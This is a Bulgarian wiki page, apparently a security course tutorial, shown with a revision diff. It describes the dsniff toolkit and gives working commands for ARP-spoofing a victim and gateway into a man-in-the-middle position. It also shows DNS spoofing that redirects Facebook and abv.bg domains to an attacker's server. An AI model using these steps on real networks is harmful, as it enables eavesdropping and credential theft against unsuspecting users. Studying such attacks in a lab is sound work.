Difference between revisions of "Spoofing"
Line 32: | Line 32: | ||
Инсталация в Убунту: | Инсталация в Убунту: | ||
~$ sudo apt-get install dsniff | ~$ sudo apt-get install dsniff | ||
+ | |||
+ | == arpspoof == | ||
+ | |||
+ | Пренасочване на трафика през вашата машина: | ||
+ | |||
+ | victim - машината, която ще се подслушва | ||
+ | gateway - gateway на мрежата | ||
+ | |||
+ | стартиране на | ||
+ | $arpspoof -t victim gateway | ||
+ | $arpspoof -t gateway victim | ||
+ | |||
+ | Включване на IP forwarding, иначе жертвата ще загуби свързаност | ||
+ | $echo 1 > /proc/sys/net/ipv4/ip_forward | ||
+ | |||
+ | Стартирайте wireshark и проверете дали атаката има успех | ||
== dnsspoof == | == dnsspoof == |
Revision as of 15:46, 13 October 2011
dsniff
dsniff Включва различни инструменти даващи възможност за "компрометиране на мрежата"
Включени инструменти:
- arpspoof - Send out unrequested (and possibly forged) arp replies.
- dnsspoof - forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
- dsniff - password sniffer for several protocols.
filesnarf - saves selected files sniffed from NFS traffic.
macof - flood the local network with random MAC addresses.
mailsnarf - sniffs mail on the LAN and stores it in mbox format.
msgsnarf - record selected messages from different Instant Messengers.
sshmitm - SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
sshow - SSH traffic analyser.
tcpkill - kills specified in-progress TCP connections.
tcpnice - slow down specified TCP connections via "active" traffic shaping.
urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.
webmitm - HTTP / HTTPS monkey-in-the-middle. transparently proxies.
webspy - sends URLs sniffed from a client to your local browser (requires libx11-6 installed).
Инсталация в Убунту:
~$ sudo apt-get install dsniff
arpspoof
Пренасочване на трафика през вашата машина:
victim - машината, която ще се подслушва gateway - gateway на мрежата
стартиране на
$arpspoof -t victim gateway $arpspoof -t gateway victim
Включване на IP forwarding, иначе жертвата ще загуби свързаност
$echo 1 > /proc/sys/net/ipv4/ip_forward
Стартирайте wireshark и проверете дали атаката има успех
dnsspoof
1. Създаване на файл с хостовете, които искаме да фалшифицираме. Заменете в примерния файл IP адресите с адреса на вашия web server, a имената на домейни с домейните, които искаме да фалшифицираме.
Създаване на файл.
~$nano host.new
Примерно съдържание.
172.16.16.165 *.facebook.com 172.16.16.165 *.abv.bg
2. Стартиране на програмата, като администратор
~$sudo dnsspoof -f host.new
След стартиране програмата слуша за dns запитвания.